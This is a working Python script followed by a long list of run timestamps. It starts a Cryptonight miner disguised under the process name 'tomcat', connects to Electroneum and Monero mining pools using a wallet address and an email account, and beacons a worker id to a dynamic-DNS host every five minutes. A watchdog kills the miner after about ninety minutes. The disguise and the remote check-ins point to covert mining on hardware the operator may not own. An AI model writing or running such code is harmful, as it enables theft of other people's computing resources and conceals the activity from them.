import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:46:04.536047
#2018-02-17 17:35:01.862574
#2018-02-17 19:22:07.193027
#2018-02-17 21:12:01.532813
#2018-02-17 22:56:02.033387
#2018-02-18 00:43:02.036709
#2018-02-18 02:32:05.246786
#2018-02-18 04:19:03.963304
#2018-02-18 06:09:06.859075
#2018-02-18 07:58:07.417333
#2018-02-18 09:46:06.157862
#2018-02-18 11:32:04.693256
#2018-02-18 13:17:07.872122
#2018-02-18 15:07:07.159788
#2018-02-18 16:54:07.431880
#2018-02-18 18:43:01.889838
#2018-02-18 20:30:07.061592
#2018-02-18 22:15:07.240343
#2018-02-19 00:04:05.336697
#2018-02-19 01:49:07.264682
#2018-02-19 03:37:06.601682
#2018-02-19 05:22:07.123269
#2018-02-19 07:09:06.516251
#2018-02-19 08:58:05.513236
#2018-02-19 10:46:06.296069
#2018-02-19 12:35:08.912379
#2018-02-19 14:22:07.074642
#2018-02-19 16:11:05.739892
#2018-02-19 17:58:02.059851
#2018-02-19 19:44:06.260487
#2018-02-19 21:31:04.051574
#2018-02-19 23:17:02.049967
#2018-02-20 01:03:06.237256
#2018-02-20 02:51:03.837931
#2018-02-20 04:38:05.529080
#2018-02-20 06:22:06.717043
#2018-02-20 08:07:02.197741
#2018-02-20 09:52:02.123990
#2018-02-20 11:36:01.741095
#2018-02-20 13:22:08.632522
#2018-02-20 15:08:03.859769
#2018-02-20 16:52:08.040415
#2018-02-20 18:41:07.980844
#2018-02-20 20:33:01.262526
#2018-02-20 22:18:01.733114
#2018-02-20 23:59:07.178152
#2018-02-21 01:46:01.518244
#2018-02-21 03:34:05.446111
#2018-02-21 05:22:03.875598
#2018-02-21 07:09:03.402865
#2018-02-21 08:55:03.079954
#2018-02-21 10:42:05.906475
#2018-02-21 12:30:08.106012
#2018-02-21 14:17:07.450310
#2018-02-21 16:05:08.471156
#2018-02-21 17:56:02.199361
#2018-02-21 19:42:04.698511
#2018-02-21 21:29:07.671082
#2018-02-21 23:16:04.015839
#2018-02-22 01:07:03.870527
#2018-02-22 02:54:06.909800
#2018-02-22 04:41:07.189945
#2018-02-22 06:25:09.146032
#2018-02-22 08:12:05.469012
#2018-02-22 09:59:04.009392
#2018-02-22 11:44:06.872902
#2018-02-22 13:31:01.867073
#2018-02-22 15:20:08.194019
#2018-02-22 17:07:01.648935
#2018-02-22 18:55:04.954233
#2018-02-22 20:46:07.410959
#2018-02-22 23:59:01.461240
#2018-02-23 01:47:07.772685
#2018-02-23 03:35:06.797243
#2018-02-23 05:21:03.645947
#2018-02-23 07:07:05.622186
#2018-02-23 08:56:01.427232
#2018-02-23 11:14:06.076514
#2018-02-23 13:07:07.944119
#2018-02-23 14:53:02.133105
#2018-02-23 16:42:01.428872
#2018-02-23 18:28:01.541797
#2018-02-23 20:12:04.620166
#2018-02-23 22:01:07.589034
#2018-02-23 23:50:07.542174
#2018-02-24 01:40:04.204236
#2018-02-24 03:28:07.290310
#2018-02-24 05:14:04.809737
#2018-02-24 07:02:05.269622
#2018-02-24 08:35:06.333191
#2018-02-24 10:09:03.296304
#2018-02-24 11:52:01.497587
#2018-02-24 13:20:04.071294
#2018-02-24 14:52:07.243754
#2018-02-24 16:27:01.568318
#2018-02-24 18:02:04.959003
#2018-02-24 19:32:07.378196
#2018-02-24 21:08:01.250335
#2018-02-24 23:11:05.388652
#2018-02-25 01:33:06.019868
#2018-02-25 05:25:06.572037
#2018-02-25 11:35:01.777529